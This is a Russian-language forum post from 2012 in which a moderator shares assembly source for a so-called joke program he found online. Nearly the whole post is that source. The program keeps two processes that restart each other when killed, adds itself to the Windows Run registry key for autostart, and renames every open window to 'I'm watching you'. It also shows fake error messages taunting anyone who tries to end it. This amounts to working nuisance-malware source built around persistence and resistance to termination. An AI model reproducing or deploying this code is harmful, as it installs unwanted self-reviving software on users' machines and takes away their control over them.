Дата: Воскресенье, 24.06.2012, 17:47 | Сообщение # 1
Постоянный
Зарегистрирован: 19.12.2009
Группа: Модераторы
Сообщений: 182
Статус: Offline
В очередной раз бродя по просторам Интернета, Я наткнулся на /code, аффтор позиционирует её как программа-шутка, но мы-то знаем, что "в каждой шутке есть доля шутки, а всё остальное правда"
dwThreadID dd ?
dwLastError dd ?
dwCurrentPID dd ?
; Мьютески, используются в перекрестном режиме
psMutexName1 db '_suxMutex1',0
psMutexName2 db '_suxMutex2',0
; Этот мьютекс для убивания процесса
; Если он будет занят, то восстановление процесса бедет отключено
psMutexKill db '_suxMutexK',0
; Указатель на хэндл "текущего" (для процесса) мьютекса
phMutexCheck dd ?
psSystemError1Body db 'Ошибка! Процесс не завершен!',13,\
'К сожалению сразу же после завершения, данный процесс запустился снова.',13,\
'Попробуйте повторить операцию еще раз. Может быть повезет. :)',0
psSystemError1 db 'Ошибка! Процесс не завершен!',0
psSystemKillBody db 'Теперь убейте все процессы с именем',13,'%s',13,\
'и имеющими ID, отличными от %d',0
psSystemKill db 'Внимание!',0
psBuffer db 300 DUP(?)
psGaGaGa db 'Я за тобой наблюдаю...',0
; Здесь хранится текущая директория с именем файла
psDirectory db 200 DUP(?)
; Константы для командной строки
TEMP_PROCESS EQU 't'
KILL_PROCESS EQU 'k'
; Параметры командной строки
psCmdTemp db TEMP_PROCESS,0
psCmdKill db KILL_PROCESS,0
; Это ветвь реестра для автозагрузки
psRegPath db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; Имя программы
psNameProg db 'FunProg',0
a_si STARTUPINFO ?
a_pi PROCESS_INFORMATION ?
section '.code' code readable executable
start:
; Подготовка: получаем путь до программы
invoke GetModuleHandle
invoke GetModuleFileName, eax, psDirectory, 200
; Получаем указатель на строку с параметрами запуска
invoke GetCommandLine
; Ставим указатель на последний символ параметров командной строки
mov edx, eax
stdcall strlen, eax
add eax, edx
dec eax
; Если передан параметр k, то перемещаемся на кусок кода для блокировки
cmp byte [eax], KILL_PROCESS
je _KillProcess
; Если в возвращенной строке 1ый символ t (от temp), то это сигнал, что данный процесс является посредником..
cmp byte [eax], TEMP_PROCESS
jne _noTempProcess
; В начале проверка блокирующего мьютекса
; Проверяем занятость блокирующего мьютекса
invoke CreateMutex, NULL, FALSE, psMutexKill
mov [hMutex], eax
; Если семафор не создан, то проходим без изменений
invoke GetLastError
cmp eax, ERROR_ALREADY_EXISTS
je _noCreateProcess
; Вызываем процесс "не посредник"
invoke CreateProcess, NULL, psDirectory, NULL, NULL, FALSE, 0, NULL, NULL, a_si, a_pi
_noCreateProcess:
; Обязательное закрытие хэндла мьютекса
invoke CloseHandle, [hMutex]
jmp _ExitProcess
_noTempProcess:
; Создаем именованный мьютеск (1)
invoke CreateMutex, NULL, FALSE, psMutexName1
mov [hMutex], eax
; Если мьютеск создан, создаем еще один процесс, иначе, если ошибка (семафор уже создан в другом потоке), то не порождаем процесса
invoke GetLastError
cmp eax, ERROR_ALREADY_EXISTS
jne _Mutex1next
invoke CloseHandle, [hMutex]
; Создаем именованный мьютеск (2)
invoke CreateMutex, NULL, FALSE, psMutexName2
; Обязательное закрытие хэндла
mov [hMutex], eax
; Если семафор создан, создаем еще один процесс, иначе, если ошибка (семафор уже создан в другом потоке), то не порождаем процесса
invoke GetLastError
cmp eax, ERROR_ALREADY_EXISTS
jne _Mutex2next
; Обязательное закрытие хэндла
invoke CloseHandle, [hMutex]
; Прыжек на завершение
jmp _ExitProcess
_Mutex1next:
; Порождение дочернего процесса (посредника)
invoke CreateProcess, psDirectory, psCmdTemp, NULL, NULL, FALSE, 0, NULL, NULL, a_si, a_pi
; Занесение в проверяемый мьютеск адрес имени 2ого мьютеска
mov [phMutexCheck], psMutexName2
jmp _EndInitial
_Mutex2next:
; Занесение в проверяемый мьютеск адрес имени 1ого мьютеска
mov [phMutexCheck], psMutexName1
; создаем дочерний поток, в нем будет работать сам "вредный код".
invoke CreateThread, NULL, 0, DestructFunction, NULL, 0, NULL
_EndInitial:
invoke Sleep, 150
; Конец инициализации программы, далее рабочая часть:
_RepeatBody:
; Код проверки на существование мьютекса:
invoke CreateMutex, NULL, FALSE, [phMutexCheck]
; Сразу закрытие хэндла (иначе его не захватит другой процесс)
invoke CloseHandle, eax
; Если мьютеск создан, создаем еще один процесс, иначе, если ошибка (мьютекс уже создан в другом потоке), то не порождаем процесса
invoke GetLastError
cmp eax, ERROR_ALREADY_EXISTS
je _MutexExist
; Если проверяемый мьютекс не существует, то создание еще одного потока (посредника)
invoke CreateProcess, psDirectory, psCmdTemp, NULL, NULL, FALSE, 0, NULL, NULL, a_si, a_pi
; Вывод сообщения о "неудачном" завершении
invoke CreateThread, NULL, 0, MessageFunction, NULL, 0, NULL
; Задержка, чтобы процесс успел запуститься
invoke Sleep, 200
_MutexExist:
; Здесь код проверки и добавления ключа реестра
; HKEY_CURRENT_USER - ветка для конкретного пользователя
; HKEY_LOCAL_MACHINE - ветка "для всех", но доступна на запись только для администратора
; Открываем нужную ветку в реестре
invoke RegCreateKeyEx, HKEY_CURRENT_USER, psRegPath,\
NULL, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, hKey, NULL
; Добавляем/заменяем запись автозагрузки
invoke RegSetValueEx, [hKey], psNameProg, NULL, REG_SZ, psDirectory, 200
; Закрываем реестр
invoke RegCloseKey, [hKey]
; Задержка, чтобы не грузило проц...
invoke Sleep, PRIMARY_DELAY
jmp _RepeatBody
; Это главная функция, содуржащая какой-либо код для выполнения
proc DestructFunction arg:DWORD
push ebx esi edi
; Задержка перед первым проявлением
invoke Sleep, FIRST_DELAY
.repeat:
;
; Основной цикл рабочей ф-ции
;
; Перебор всех окон
invoke EnumWindows, EnumHWND, 0
;
; Интервал повторения
;
invoke Sleep, DESTRUCT_DELAY
jmp .repeat
pop edi esi ebx
ret
endp
; Вспомогательная деструктивная функция (меняет заголовок окна)
proc EnumHWND hwnd:DWORD, lparam:DWORD
push edi esi ebx
; Посылка сообщения для изменения заголовка
invoke SendMessage, [hwnd], WM_SETTEXT, 0, psGaGaGa
pop ebx esi edi
ret
endp
; Ф-ция возвращает длину null строки
proc strlen stdcall lpSting:DWORD
push ecx edx
mov ecx,[lpSting]
sub edx,edx
sub eax,eax
.l00p: cmp [ecx],dl
je .ret
inc ecx
inc eax
jmp .l00p
.ret: pop edx ecx
ret
endp
; Данная функция выводит сообщение о "неудачном" завершении процесса.
proc MessageFunction arg:DWORD
push ebx esi edi
invoke MessageBox, NULL, psSystemError1Body, psSystemError1, MB_ICONERROR
pop edi esi ebx
ret
endp
